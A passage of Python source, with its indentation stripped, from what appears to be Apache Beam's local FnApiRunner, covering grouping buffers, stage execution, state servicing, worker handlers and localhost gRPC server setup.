key, value = windowed_key_value.value
self._table[key_coder_impl.encode(key)].append(
value if is_trivial_windowing
else windowed_key_value.with_value(value))
def partition(self, n):
""" It is used to partition _GroupingBuffer to N parts. Once it is
partitioned, it would not be re-partitioned with diff N. Re-partition
is not supported now.
"""
if not self._grouped_output:
if self._windowing.is_default():
globally_window = GlobalWindows.windowed_value(
None,
timestamp=GlobalWindow().max_timestamp(),
pane_info=windowed_value.PaneInfo(
is_first=True,
is_last=True,
timing=windowed_value.PaneInfoTiming.ON_TIME,
index=0,
nonspeculative_index=0)).with_value
windowed_key_values = lambda key, values: [
globally_window((key, values))]
else:
# TODO(pabloem, BEAM-7514): Trigger driver needs access to the clock
# note that this only comes through if windowing is default - but what
# about having multiple firings on the global window.
# May need to revise.
trigger_driver = trigger.create_trigger_driver(self._windowing, True)
windowed_key_values = trigger_driver.process_entire_key
coder_impl = self._post_grouped_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
self._grouped_output = [[] for _ in range(n)]
output_stream_list = []
for _ in range(n):
output_stream_list.append(create_OutputStream())
for idx, (encoded_key, windowed_values) in enumerate(self._table.items()):
key = key_coder_impl.decode(encoded_key)
for wkvs in windowed_key_values(key, windowed_values):
coder_impl.encode_to_stream(wkvs, output_stream_list[idx % n], True)
for ix, output_stream in enumerate(output_stream_list):
self._grouped_output[ix] = [output_stream.get()]
self._table = None
return self._grouped_output
def __iter__(self):
""" Since partition() returns a list of lists, add this __iter__ to return
a list to simplify code when we need to iterate through ALL elements of
_GroupingBuffer.
"""
return itertools.chain(*self.partition(1))
class _WindowGroupingBuffer(object):
"""Used to partition windowed side inputs."""
def __init__(self, access_pattern, coder):
# Here's where we would use a different type of partitioning
# (e.g. also by key) for a different access pattern.
if access_pattern.urn == common_urns.side_inputs.ITERABLE.urn:
self._kv_extrator = lambda value: ('', value)
self._key_coder = coders.SingletonCoder('')
self._value_coder = coder.wrapped_value_coder
elif access_pattern.urn == common_urns.side_inputs.MULTIMAP.urn:
self._kv_extrator = lambda value: value
self._key_coder = coder.wrapped_value_coder.key_coder()
self._value_coder = (
coder.wrapped_value_coder.value_coder())
else:
raise ValueError(
"Unknown access pattern: '%s'" % access_pattern.urn)
self._windowed_value_coder = coder
self._window_coder = coder.window_coder
self._values_by_window = collections.defaultdict(list)
def append(self, elements_data):
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_value = self._windowed_value_coder.get_impl(
).decode_from_stream(input_stream, True)
key, value = self._kv_extrator(windowed_value.value)
for window in windowed_value.windows:
self._values_by_window[key, window].append(value)
def encoded_items(self):
value_coder_impl = self._value_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
for (key, window), values in self._values_by_window.items():
encoded_window = self._window_coder.encode(window)
encoded_key = key_coder_impl.encode_nested(key)
output_stream = create_OutputStream()
for value in values:
value_coder_impl.encode_to_stream(value, output_stream, True)
yield encoded_key, encoded_window, output_stream.get()
class FnApiRunner(runner.PipelineRunner):
def __init__(
self,
default_environment=None,
bundle_repeat=0,
use_state_iterables=False,
provision_info=None,
progress_request_frequency=None):
"""Creates a new Fn API Runner.
Args:
default_environment: the default environment to use for UserFns.
bundle_repeat: replay every bundle this many extra times, for profiling
and debugging
use_state_iterables: Intentionally split gbk iterables over state API
(for testing)
provision_info: provisioning info to make available to workers, or None
progress_request_frequency: The frequency (in seconds) that the runner
waits before requesting progress from the SDK.
"""
super(FnApiRunner, self).__init__()
self._last_uid = -1
self._default_environment = (
default_environment
or environments.EmbeddedPythonEnvironment())
self._bundle_repeat = bundle_repeat
self._num_workers = 1
self._progress_frequency = progress_request_frequency
self._profiler_factory = None
self._use_state_iterables = use_state_iterables
self._provision_info = provision_info or ExtendedProvisionInfo(
beam_provision_api_pb2.ProvisionInfo(
job_id='unknown-job-id',
job_name='unknown-job-name',
retrieval_token='unused-retrieval-token'))
def _next_uid(self):
self._last_uid += 1
return str(self._last_uid)
def run_pipeline(self, pipeline, options):
RuntimeValueProvider.set_runtime_options({})
# Setup "beam_fn_api" experiment options if lacked.
experiments = (options.view_as(pipeline_options.DebugOptions).experiments
or [])
if not 'beam_fn_api' in experiments:
experiments.append('beam_fn_api')
options.view_as(pipeline_options.DebugOptions).experiments = experiments
# This is sometimes needed if type checking is disabled
# to enforce that the inputs (and outputs) of GroupByKey operations
# are known to be KVs.
from apache_beam.runners.dataflow.dataflow_runner import DataflowRunner
# TODO: Move group_by_key_input_visitor() to a non-dataflow specific file.
pipeline.visit(DataflowRunner.group_by_key_input_visitor())
self._bundle_repeat = self._bundle_repeat or options.view_as(
pipeline_options.DirectOptions).direct_runner_bundle_repeat
self._num_workers = options.view_as(
pipeline_options.DirectOptions).direct_num_workers or self._num_workers
self._profiler_factory = profiler.Profile.factory_from_options(
options.view_as(pipeline_options.ProfilingOptions))
if 'use_sdf_bounded_source' in experiments:
pipeline.replace_all(DataflowRunner._SDF_PTRANSFORM_OVERRIDES)
self._latest_run_result = self.run_via_runner_api(pipeline.to_runner_api(
default_environment=self._default_environment))
return self._latest_run_result
def run_via_runner_api(self, pipeline_proto):
stage_context, stages = self.create_stages(pipeline_proto)
# TODO(pabloem, BEAM-7514): Create a watermark manager (that has access to
# the teststream (if any), and all the stages).
return self.run_stages(stage_context, stages)
@contextlib.contextmanager
def maybe_profile(self):
if self._profiler_factory:
try:
profile_id = 'direct-' + subprocess.check_output(
['git', 'rev-parse', '--abbrev-ref', 'HEAD']
).decode(errors='ignore').strip()
except subprocess.CalledProcessError:
profile_id = 'direct-unknown'
profiler = self._profiler_factory(profile_id, time_prefix='')
else:
profiler = None
if profiler:
with profiler:
yield
if not self._bundle_repeat:
logging.warning(
'The --direct_runner_bundle_repeat option is not set; '
'a significant portion of the profile may be one-time overhead.')
path = profiler.profile_output
print('CPU Profile written to %s' % path)
try:
import gprof2dot # pylint: disable=unused-import
if not subprocess.call([
sys.executable, '-m', 'gprof2dot',
'-f', 'pstats', path, '-o', path + '.dot']):
if not subprocess.call(
['dot', '-Tsvg', '-o', path + '.svg', path + '.dot']):
print('CPU Profile rendering at file://%s.svg'
% os.path.abspath(path))
except ImportError:
# pylint: disable=superfluous-parens
print('Please install gprof2dot and dot for profile renderings.')
else:
# Empty context.
yield
def create_stages(self, pipeline_proto):
return fn_api_runner_transforms.create_and_optimize_stages(
copy.deepcopy(pipeline_proto),
phases=[fn_api_runner_transforms.annotate_downstream_side_inputs,
fn_api_runner_transforms.fix_side_input_pcoll_coders,
fn_api_runner_transforms.lift_combiners,
fn_api_runner_transforms.expand_sdf,
fn_api_runner_transforms.expand_gbk,
fn_api_runner_transforms.sink_flattens,
fn_api_runner_transforms.greedily_fuse,
fn_api_runner_transforms.read_to_impulse,
fn_api_runner_transforms.impulse_to_input,
fn_api_runner_transforms.inject_timer_pcollections,
fn_api_runner_transforms.sort_stages,
fn_api_runner_transforms.window_pcollection_coders],
known_runner_urns=frozenset([
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn]),
use_state_iterables=self._use_state_iterables)
def run_stages(self, stage_context, stages):
"""Run a list of topologically-sorted stages in batch mode.
Args:
stage_context (fn_api_runner_transforms.TransformContext)
stages (list[fn_api_runner_transforms.Stage])
"""
worker_handler_manager = WorkerHandlerManager(
stage_context.components.environments, self._provision_info)
metrics_by_stage = {}
monitoring_infos_by_stage = {}
try:
with self.maybe_profile():
pcoll_buffers = collections.defaultdict(_ListBuffer)
for stage in stages:
stage_results = self._run_stage(
worker_handler_manager.get_worker_handlers,
stage_context.components,
stage,
pcoll_buffers,
stage_context.safe_coders)
metrics_by_stage[stage.name] = stage_results.process_bundle.metrics
monitoring_infos_by_stage[stage.name] = (
stage_results.process_bundle.monitoring_infos)
finally:
worker_handler_manager.close_all()
return RunnerResult(
runner.PipelineState.DONE, monitoring_infos_by_stage, metrics_by_stage)
def _store_side_inputs_in_state(self,
worker_handler,
context,
pipeline_components,
data_side_input,
pcoll_buffers,
safe_coders):
for (transform_id, tag), (buffer_id, si) in data_side_input.items():
_, pcoll_id = split_buffer_id(buffer_id)
value_coder = context.coders[safe_coders[
pipeline_components.pcollections[pcoll_id].coder_id]]
elements_by_window = _WindowGroupingBuffer(si, value_coder)
for element_data in pcoll_buffers[buffer_id]:
elements_by_window.append(element_data)
for key, window, elements_data in elements_by_window.encoded_items():
state_key = beam_fn_api_pb2.StateKey(
multimap_side_input=beam_fn_api_pb2.StateKey.MultimapSideInput(
transform_id=transform_id,
side_input_id=tag,
window=window,
key=key))
worker_handler.state.append_raw(state_key, elements_data)
def _run_bundle_multiple_times_for_testing(
self, worker_handler_list, process_bundle_descriptor, data_input,
data_output, get_input_coder_callable, cache_token_generator):
# all workers share state, so use any worker_handler.
worker_handler = worker_handler_list[0]
for k in range(self._bundle_repeat):
try:
worker_handler.state.checkpoint()
testing_bundle_manager = ParallelBundleManager(
worker_handler_list, lambda pcoll_id: [],
get_input_coder_callable, process_bundle_descriptor,
self._progress_frequency, k,
num_workers=self._num_workers,
cache_token_generator=cache_token_generator
)
testing_bundle_manager.process_bundle(data_input, data_output)
finally:
worker_handler.state.restore()
def _collect_written_timers_and_add_to_deferred_inputs(self,
context,
pipeline_components,
stage,
get_buffer_callable,
deferred_inputs):
for transform_id, timer_writes in stage.timer_pcollections:
# Queue any set timers as new inputs.
windowed_timer_coder_impl = context.coders[
pipeline_components.pcollections[timer_writes].coder_id].get_impl()
written_timers = get_buffer_callable(
create_buffer_id(timer_writes, kind='timers'))
if written_timers:
# Keep only the "last" timer set per key and window.
timers_by_key_and_window = {}
for elements_data in written_timers:
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_key_timer = windowed_timer_coder_impl.decode_from_stream(
input_stream, True)
key, _ = windowed_key_timer.value
# TODO: Explode and merge windows.
assert len(windowed_key_timer.windows) == 1
timers_by_key_and_window[
key, windowed_key_timer.windows[0]] = windowed_key_timer
out = create_OutputStream()
for windowed_key_timer in timers_by_key_and_window.values():
windowed_timer_coder_impl.encode_to_stream(
windowed_key_timer, out, True)
deferred_inputs[transform_id] = _ListBuffer([out.get()])
written_timers[:] = []
def _add_residuals_and_channel_splits_to_deferred_inputs(
self, splits, get_input_coder_callable,
input_for_callable, last_sent, deferred_inputs):
prev_stops = {}
for split in splits:
for delayed_application in split.residual_roots:
deferred_inputs[
input_for_callable(
delayed_application.application.transform_id,
delayed_application.application.input_id)
].append(delayed_application.application.element)
for channel_split in split.channel_splits:
coder_impl = get_input_coder_callable(channel_split.transform_id)
# TODO(SDF): This requires determanistic ordering of buffer iteration.
# TODO(SDF): The return split is in terms of indices. Ideally,
# a runner could map these back to actual positions to effectively
# describe the two "halves" of the now-split range. Even if we have
# to buffer each element we send (or at the very least a bit of
# metadata, like position, about each of them) this should be doable
# if they're already in memory and we are bounding the buffer size
# (e.g. to 10mb plus whatever is eagerly read from the SDK). In the
# case of non-split-points, we can either immediately replay the
# "non-split-position" elements or record them as we do the other
# delayed applications.
# Decode and recode to split the encoded buffer by element index.
all_elements = list(coder_impl.decode_all(b''.join(last_sent[
channel_split.transform_id])))
residual_elements = all_elements[
channel_split.first_residual_element : prev_stops.get(
channel_split.transform_id, len(all_elements)) + 1]
if residual_elements:
deferred_inputs[channel_split.transform_id].append(
coder_impl.encode_all(residual_elements))
prev_stops[
channel_split.transform_id] = channel_split.last_primary_element
@staticmethod
def _extract_stage_data_endpoints(
stage, pipeline_components, data_api_service_descriptor, pcoll_buffers):
# Returns maps of transform names to PCollection identifiers.
# Also mutates IO stages to point to the data ApiServiceDescriptor.
data_input = {}
data_side_input = {}
data_output = {}
for transform in stage.transforms:
if transform.spec.urn in (bundle_processor.DATA_INPUT_URN,
bundle_processor.DATA_OUTPUT_URN):
pcoll_id = transform.spec.payload
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
target = transform.unique_name, only_element(transform.outputs)
if pcoll_id == fn_api_runner_transforms.IMPULSE_BUFFER:
data_input[target] = _ListBuffer([ENCODED_IMPULSE_VALUE])
else:
data_input[target] = pcoll_buffers[pcoll_id]
coder_id = pipeline_components.pcollections[
only_element(transform.outputs.values())].coder_id
elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN:
target = transform.unique_name, only_element(transform.inputs)
data_output[target] = pcoll_id
coder_id = pipeline_components.pcollections[
only_element(transform.inputs.values())].coder_id
else:
raise NotImplementedError
data_spec = beam_fn_api_pb2.RemoteGrpcPort(coder_id=coder_id)
if data_api_service_descriptor:
data_spec.api_service_descriptor.url = (
data_api_service_descriptor.url)
transform.spec.payload = data_spec.SerializeToString()
elif transform.spec.urn in fn_api_runner_transforms.PAR_DO_URNS:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for tag, si in payload.side_inputs.items():
data_side_input[transform.unique_name, tag] = (
create_buffer_id(transform.inputs[tag]), si.access_pattern)
return data_input, data_side_input, data_output
def _run_stage(self,
worker_handler_factory,
pipeline_components,
stage,
pcoll_buffers,
safe_coders):
"""Run an individual stage.
Args:
worker_handler_factory: A ``callable`` that takes in an environment, and
returns a ``WorkerHandler`` class.
pipeline_components (beam_runner_api_pb2.Components): TODO
stage (fn_api_runner_transforms.Stage)
pcoll_buffers (collections.defaultdict of str: list): Mapping of
PCollection IDs to list that functions as buffer for the
``beam.PCollection``.
safe_coders (dict): TODO
"""
def iterable_state_write(values, element_coder_impl):
token = unique_name(None, 'iter').encode('ascii')
out = create_OutputStream()
for element in values:
element_coder_impl.encode_to_stream(element, out, True)
worker_handler.state.append_raw(
beam_fn_api_pb2.StateKey(
runner=beam_fn_api_pb2.StateKey.Runner(key=token)),
out.get())
return token
worker_handler_list = worker_handler_factory(
stage.environment, self._num_workers)
# All worker_handlers share the same grpc server, so we can read grpc server
# info from any worker_handler and read from the first worker_handler.
worker_handler = next(iter(worker_handler_list))
context = pipeline_context.PipelineContext(
pipeline_components, iterable_state_write=iterable_state_write)
data_api_service_descriptor = worker_handler.data_api_service_descriptor()
logging.info('Running %s', stage.name)
data_input, data_side_input, data_output = self._extract_endpoints(
stage, pipeline_components, data_api_service_descriptor, pcoll_buffers)
process_bundle_descriptor = beam_fn_api_pb2.ProcessBundleDescriptor(
id=self._next_uid(),
transforms={transform.unique_name: transform
for transform in stage.transforms},
pcollections=dict(pipeline_components.pcollections.items()),
coders=dict(pipeline_components.coders.items()),
windowing_strategies=dict(
pipeline_components.windowing_strategies.items()),
environments=dict(pipeline_components.environments.items()))
if worker_handler.state_api_service_descriptor():
process_bundle_descriptor.state_api_service_descriptor.url = (
worker_handler.state_api_service_descriptor().url)
# Store the required side inputs into state so it is accessible for the
# worker when it runs this bundle.
self._store_side_inputs_in_state(worker_handler,
context,
pipeline_components,
data_side_input,
pcoll_buffers,
safe_coders)
def get_buffer(buffer_id):
"""Returns the buffer for a given (operation_type, PCollection ID).
For grouping-typed operations, we produce a ``_GroupingBuffer``. For
others, we produce a ``_ListBuffer``.
"""
kind, name = split_buffer_id(buffer_id)
if kind in ('materialize', 'timers'):
# If `buffer_id` is not a key in `pcoll_buffers`, it will be added by
# the `defaultdict`.
return pcoll_buffers[buffer_id]
elif kind == 'group':
# This is a grouping write, create a grouping buffer if needed.
if buffer_id not in pcoll_buffers:
original_gbk_transform = name
transform_proto = pipeline_components.transforms[
original_gbk_transform]
input_pcoll = only_element(list(transform_proto.inputs.values()))
output_pcoll = only_element(list(transform_proto.outputs.values()))
pre_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[input_pcoll].coder_id]]
post_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[output_pcoll].coder_id]]
windowing_strategy = context.windowing_strategies[
pipeline_components
.pcollections[output_pcoll].windowing_strategy_id]
pcoll_buffers[buffer_id] = _GroupingBuffer(
pre_gbk_coder, post_gbk_coder, windowing_strategy)
else:
# These should be the only two identifiers we produce for now,
# but special side input writes may go here.
raise NotImplementedError(buffer_id)
return pcoll_buffers[buffer_id]
def get_input_coder_impl(transform_id):
return context.coders[safe_coders[
beam_fn_api_pb2.RemoteGrpcPort.FromString(
process_bundle_descriptor.transforms[transform_id].spec.payload
).coder_id
]].get_impl()
# Change cache token across bundle repeats
cache_token_generator = FnApiRunner.get_cache_token_generator(static=False)
self._run_bundle_multiple_times_for_testing(
worker_handler_list, process_bundle_descriptor, data_input, data_output,
get_input_coder_impl, cache_token_generator=cache_token_generator)
bundle_manager = ParallelBundleManager(
worker_handler_list, get_buffer, get_input_coder_impl,
process_bundle_descriptor, self._progress_frequency,
num_workers=self._num_workers,
cache_token_generator=cache_token_generator)
result, splits = bundle_manager.process_bundle(data_input, data_output)
def input_for(transform_id, input_id):
input_pcoll = process_bundle_descriptor.transforms[
transform_id].inputs[input_id]
for read_id, proto in process_bundle_descriptor.transforms.items():
if (proto.spec.urn == bundle_processor.DATA_INPUT_URN
and input_pcoll in proto.outputs.values()):
return read_id
raise RuntimeError(
'No IO transform feeds %s' % transform_id)
last_result = result
last_sent = data_input
while True:
deferred_inputs = collections.defaultdict(_ListBuffer)
self._collect_written_timers_and_add_to_deferred_inputs(
context, pipeline_components, stage, get_buffer, deferred_inputs)
# Queue any process-initiated delayed bundle applications.
for delayed_application in last_result.process_bundle.residual_roots:
deferred_inputs[
input_for(
delayed_application.application.transform_id,
delayed_application.application.input_id)
].append(delayed_application.application.element)
# Queue any runner-initiated delayed bundle applications.
self._add_residuals_and_channel_splits_to_deferred_inputs(
splits, get_input_coder_impl, input_for, last_sent, deferred_inputs)
if deferred_inputs:
# The worker will be waiting on these inputs as well.
for other_input in data_input:
if other_input not in deferred_inputs:
deferred_inputs[other_input] = _ListBuffer([])
# TODO(robertwb): merge results
# We cannot split deferred_input until we include residual_roots to
# merged results. Without residual_roots, pipeline stops earlier and we
# may miss some data.
bundle_manager._num_workers = 1
bundle_manager._skip_registration = True
last_result, splits = bundle_manager.process_bundle(
deferred_inputs, data_output)
last_sent = deferred_inputs
result = beam_fn_api_pb2.InstructionResponse(
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
monitoring_infos=monitoring_infos.consolidate(
itertools.chain(
result.process_bundle.monitoring_infos,
last_result.process_bundle.monitoring_infos))),
error=result.error or last_result.error)
else:
break
return result
@staticmethod
def _extract_endpoints(stage,
pipeline_components,
data_api_service_descriptor,
pcoll_buffers):
"""Returns maps of transform names to PCollection identifiers.
Also mutates IO stages to point to the data ApiServiceDescriptor.
Args:
stage (fn_api_runner_transforms.Stage): The stage to extract endpoints
for.
pipeline_components (beam_runner_api_pb2.Components): Components of the
pipeline to include coders, transforms, PCollections, etc.
data_api_service_descriptor: A GRPC endpoint descriptor for data plane.
pcoll_buffers (dict): A dictionary containing buffers for PCollection
elements.
Returns:
A tuple of (data_input, data_side_input, data_output) dictionaries.
`data_input` is a dictionary mapping (transform_name, output_name) to a
PCollection buffer; `data_output` is a dictionary mapping
(transform_name, output_name) to a PCollection ID.
"""
data_input = {}
data_side_input = {}
data_output = {}
for transform in stage.transforms:
if transform.spec.urn in (bundle_processor.DATA_INPUT_URN,
bundle_processor.DATA_OUTPUT_URN):
pcoll_id = transform.spec.payload
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
if pcoll_id == fn_api_runner_transforms.IMPULSE_BUFFER:
data_input[transform.unique_name] = _ListBuffer(
[ENCODED_IMPULSE_VALUE])
else:
data_input[transform.unique_name] = pcoll_buffers[pcoll_id]
coder_id = pipeline_components.pcollections[
only_element(transform.outputs.values())].coder_id
elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN:
data_output[transform.unique_name] = pcoll_id
coder_id = pipeline_components.pcollections[
only_element(transform.inputs.values())].coder_id
else:
raise NotImplementedError
data_spec = beam_fn_api_pb2.RemoteGrpcPort(coder_id=coder_id)
if data_api_service_descriptor:
data_spec.api_service_descriptor.url = (
data_api_service_descriptor.url)
transform.spec.payload = data_spec.SerializeToString()
elif transform.spec.urn in fn_api_runner_transforms.PAR_DO_URNS:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for tag, si in payload.side_inputs.items():
data_side_input[transform.unique_name, tag] = (
create_buffer_id(transform.inputs[tag]), si.access_pattern)
return data_input, data_side_input, data_output
# These classes are used to interact with the worker.
class StateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer):
class CopyOnWriteState(object):
def __init__(self, underlying):
self._underlying = underlying
self._overlay = {}
def __getitem__(self, key):
if key in self._overlay:
return self._overlay[key]
else:
return FnApiRunner.StateServicer.CopyOnWriteList(
self._underlying, self._overlay, key)
def __delitem__(self, key):
self._overlay[key] = []
def commit(self):
self._underlying.update(self._overlay)
return self._underlying
class CopyOnWriteList(object):
def __init__(self, underlying, overlay, key):
self._underlying = underlying
self._overlay = overlay
self._key = key
def __iter__(self):
if self._key in self._overlay:
return iter(self._overlay[self._key])
else:
return iter(self._underlying[self._key])
def append(self, item):
if self._key not in self._overlay:
self._overlay[self._key] = list(self._underlying[self._key])
self._overlay[self._key].append(item)
def __init__(self):
self._lock = threading.Lock()
self._state = collections.defaultdict(list)
self._checkpoint = None
self._use_continuation_tokens = False
self._continuations = {}
def checkpoint(self):
assert self._checkpoint is None
self._checkpoint = self._state
self._state = FnApiRunner.StateServicer.CopyOnWriteState(self._state)
def commit(self):
self._state.commit()
self._state = self._checkpoint.commit()
self._checkpoint = None
def restore(self):
self._state = self._checkpoint
self._checkpoint = None
@contextlib.contextmanager
def process_instruction_id(self, unused_instruction_id):
yield
def get_raw(self, state_key, continuation_token=None):
with self._lock:
full_state = self._state[self._to_key(state_key)]
if self._use_continuation_tokens:
# The token is "nonce:index".
if not continuation_token:
token_base = 'token_%x' % len(self._continuations)
self._continuations[token_base] = tuple(full_state)
return b'', '%s:0' % token_base
else:
token_base, index = continuation_token.split(':')
ix = int(index)
full_state = self._continuations[token_base]
if ix == len(full_state):
return b'', None
else:
return full_state[ix], '%s:%d' % (token_base, ix + 1)
else:
assert not continuation_token
return b''.join(full_state), None
def append_raw(self, state_key, data):
with self._lock:
self._state[self._to_key(state_key)].append(data)
return _Future.done()
def clear(self, state_key):
with self._lock:
try:
del self._state[self._to_key(state_key)]
except KeyError:
# This may happen with the caching layer across bundles. Caching may
# skip this storage layer for a blocking_get(key) request. Without
# the caching, the state for a key would be initialized via the
# defaultdict that _state uses.
pass
return _Future.done()
@staticmethod
def _to_key(state_key):
return state_key.SerializeToString()
class GrpcStateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer):
def __init__(self, state):
self._state = state
def State(self, request_stream, context=None):
# Note that this eagerly mutates state, assuming any failures are fatal.
# Thus it is safe to ignore instruction_id.
for request in request_stream:
request_type = request.WhichOneof('request')
if request_type == 'get':
data, continuation_token = self._state.get_raw(
request.state_key, request.get.continuation_token)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
get=beam_fn_api_pb2.StateGetResponse(
data=data, continuation_token=continuation_token))
elif request_type == 'append':
self._state.append_raw(request.state_key, request.append.data)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
append=beam_fn_api_pb2.StateAppendResponse())
elif request_type == 'clear':
self._state.clear(request.state_key)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
clear=beam_fn_api_pb2.StateClearResponse())
else:
raise NotImplementedError('Unknown state request: %s' % request_type)
class SingletonStateHandlerFactory(sdk_worker.StateHandlerFactory):
"""A singleton cache for a StateServicer."""
def __init__(self, state_handler):
self._state_handler = state_handler
def create_state_handler(self, api_service_descriptor):
"""Returns the singleton state handler."""
return self._state_handler
def close(self):
"""Does nothing."""
pass
@staticmethod
def get_cache_token_generator(static=True):
"""A generator for cache tokens.
:arg static If True, generator always returns the same cache token
If False, generator returns a new cache token each time
:return A generator which returns a cache token on next(generator)
"""
def generate_token(identifier):
return beam_fn_api_pb2.ProcessBundleRequest.CacheToken(
user_state=beam_fn_api_pb2
.ProcessBundleRequest.CacheToken.UserState(),
token="cache_token_{}".format(identifier).encode("utf-8"))
class StaticGenerator(object):
def __init__(self):
self._token = generate_token(1)
def __iter__(self):
# pylint: disable=non-iterator-returned
return self
def __next__(self):
return self._token
class DynamicGenerator(object):
def __init__(self):
self._counter = 0
self._lock = threading.Lock()
def __iter__(self):
# pylint: disable=non-iterator-returned
return self
def __next__(self):
with self._lock:
self._counter += 1
return generate_token(self._counter)
return StaticGenerator() if static else DynamicGenerator()
class WorkerHandler(object):
"""worker_handler for a worker.
It provides utilities to start / stop the worker, provision any resources for
it, as well as provide descriptors for the data, state and logging APIs for
it.
"""
_registered_environments = {}
_worker_id_counter = -1
_lock = threading.Lock()
def __init__(
self, control_handler, data_plane_handler, state, provision_info):
"""Initialize a WorkerHandler.
Args:
control_handler:
data_plane_handler (data_plane.DataChannel):
state:
provision_info:
"""
self.control_handler = control_handler
self.data_plane_handler = data_plane_handler
self.state = state
self.provision_info = provision_info
with WorkerHandler._lock:
WorkerHandler._worker_id_counter += 1
self.worker_id = 'worker_%s' % WorkerHandler._worker_id_counter
def close(self):
self.stop_worker()
def start_worker(self):
raise NotImplementedError
def stop_worker(self):
raise NotImplementedError
def data_api_service_descriptor(self):
raise NotImplementedError
def state_api_service_descriptor(self):
raise NotImplementedError
def logging_api_service_descriptor(self):
raise NotImplementedError
@classmethod
def register_environment(cls, urn, payload_type):
def wrapper(constructor):
cls._registered_environments[urn] = constructor, payload_type
return constructor
return wrapper
@classmethod
def create(cls, environment, state, provision_info, grpc_server):
constructor, payload_type = cls._registered_environments[environment.urn]
return constructor(
proto_utils.parse_Bytes(environment.payload, payload_type),
state,
provision_info,
grpc_server)
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON, None)
class EmbeddedWorkerHandler(WorkerHandler):
"""An in-memory worker_handler for fn API control, state and data planes."""
def __init__(self, unused_payload, state, provision_info,
unused_grpc_server=None):
super(EmbeddedWorkerHandler, self).__init__(
self, data_plane.InMemoryDataChannel(), state, provision_info)
self.control_conn = self
self.data_conn = self.data_plane_handler
state_cache = StateCache(STATE_CACHE_SIZE)
self.worker = sdk_worker.SdkWorker(
sdk_worker.BundleProcessorCache(
FnApiRunner.SingletonStateHandlerFactory(
sdk_worker.CachingStateHandler(state_cache, state)),
data_plane.InMemoryDataChannelFactory(
self.data_plane_handler.inverse()),
{}), state_cache_metrics_fn=state_cache.get_monitoring_infos)
self._uid_counter = 0
def push(self, request):
if not request.instruction_id:
self._uid_counter += 1
request.instruction_id = 'control_%s' % self._uid_counter
response = self.worker.do_instruction(request)
return ControlFuture(request.instruction_id, response)
def start_worker(self):
pass
def stop_worker(self):
self.worker.stop()
def done(self):
pass
def data_api_service_descriptor(self):
return None
def state_api_service_descriptor(self):
return None
def logging_api_service_descriptor(self):
return None
class BasicLoggingService(beam_fn_api_pb2_grpc.BeamFnLoggingServicer):
LOG_LEVEL_MAP = {
beam_fn_api_pb2.LogEntry.Severity.CRITICAL: logging.CRITICAL,
beam_fn_api_pb2.LogEntry.Severity.ERROR: logging.ERROR,
beam_fn_api_pb2.LogEntry.Severity.WARN: logging.WARNING,
beam_fn_api_pb2.LogEntry.Severity.NOTICE: logging.INFO + 1,
beam_fn_api_pb2.LogEntry.Severity.INFO: logging.INFO,
beam_fn_api_pb2.LogEntry.Severity.DEBUG: logging.DEBUG,
beam_fn_api_pb2.LogEntry.Severity.TRACE: logging.DEBUG - 1,
beam_fn_api_pb2.LogEntry.Severity.UNSPECIFIED: logging.NOTSET,
}
def Logging(self, log_messages, context=None):
yield beam_fn_api_pb2.LogControl()
for log_message in log_messages:
for log in log_message.log_entries:
logging.log(self.LOG_LEVEL_MAP[log.severity], str(log))
class BasicProvisionService(
beam_provision_api_pb2_grpc.ProvisionServiceServicer):
def __init__(self, info):
self._info = info
def GetProvisionInfo(self, request, context=None):
return beam_provision_api_pb2.GetProvisionInfoResponse(
info=self._info)
class EmptyArtifactRetrievalService(
beam_artifact_api_pb2_grpc.ArtifactRetrievalServiceServicer):
def GetManifest(self, request, context=None):
return beam_artifact_api_pb2.GetManifestResponse(
manifest=beam_artifact_api_pb2.Manifest())
def GetArtifact(self, request, context=None):
raise ValueError('No artifacts staged.')
class GrpcServer(object):
_DEFAULT_SHUTDOWN_TIMEOUT_SECS = 5
def __init__(self, state, provision_info, max_workers):
self.state = state
self.provision_info = provision_info
self.max_workers = max_workers
self.control_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=self.max_workers))
self.control_port = self.control_server.add_insecure_port('[::]:0')
self.control_address = 'localhost:%s' % self.control_port
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size
# is controlled in a layer above.
no_max_message_sizes = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
self.data_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=self.max_workers),
options=no_max_message_sizes)
self.data_port = self.data_server.add_insecure_port('[::]:0')
self.state_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=self.max_workers),
options=no_max_message_sizes)
self.state_port = self.state_server.add_insecure_port('[::]:0')
self.control_handler = BeamFnControlServicer()
beam_fn_api_pb2_grpc.add_BeamFnControlServicer_to_server(
self.control_handler, self.control_server)
# If we have provision info, serve these off the control port as well.
if self.provision_info:
if self.provision_info.provision_info:
provision_info = self.provision_info.provision_info
if not provision_info.worker_id:
provision_info = copy.copy(provision_info)
provision_info.worker_id = str(uuid.uuid4())
beam_provision_api_pb2_grpc.add_ProvisionServiceServicer_to_server(
BasicProvisionService(self.provision_info.provision_info),
self.control_server)
if self.provision_info.artifact_staging_dir:
service = artifact_service.BeamFilesystemArtifactService(
self.provision_info.artifact_staging_dir)
else:
service = EmptyArtifactRetrievalService()
beam_artifact_api_pb2_grpc.add_ArtifactRetrievalServiceServicer_to_server(
service, self.control_server)
